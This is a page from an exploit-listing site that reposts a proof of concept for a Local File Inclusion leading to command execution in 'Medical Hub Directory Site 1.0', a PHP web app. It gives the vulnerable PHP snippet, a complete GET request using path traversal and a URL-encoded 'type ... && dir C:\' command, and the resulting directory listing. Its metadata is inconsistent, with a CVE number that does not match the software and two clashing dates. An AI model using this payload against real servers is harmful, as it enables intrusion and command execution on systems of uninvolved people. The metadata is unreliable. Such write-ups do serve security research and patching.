Advertisement






Medical Hub Directory Site 1.0 Local File Inclusion

CVE Category Price Severity
CVE-2019-10938 CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2022-03-30
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030129

Below is a copy:

Medical Hub Directory Site 1.0 Local File Inclusion
# Title:  Medical Hub Directory Site  LFI To RCE
# Author: Hejap Zairy
# Date: 30.07.2022
# Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache



#vulnerability Code  php
Needs more filtering require_once

```
<?php 
require_once('config.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$page_name = explode("/",$page)[count(explode("/",$page)) -1];
?>```

[+] Payload GET


```
GET /mhds/index.php?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 354
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```


#Status: CRITICAL

#Response 
```

Hegap Zairy 0day Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

 Directory of C:\

03/18/2022  10:27 AM    <DIR>          Program Files
03/21/2022  01:45 PM    <DIR>          Program Files (x86)
03/02/2022  11:04 PM    <DIR>          Python27
03/26/2022  08:33 PM    <DIR>          Temp
03/26/2022  08:45 PM    <DIR>          Users

```



# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/pKIxv1l.png

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum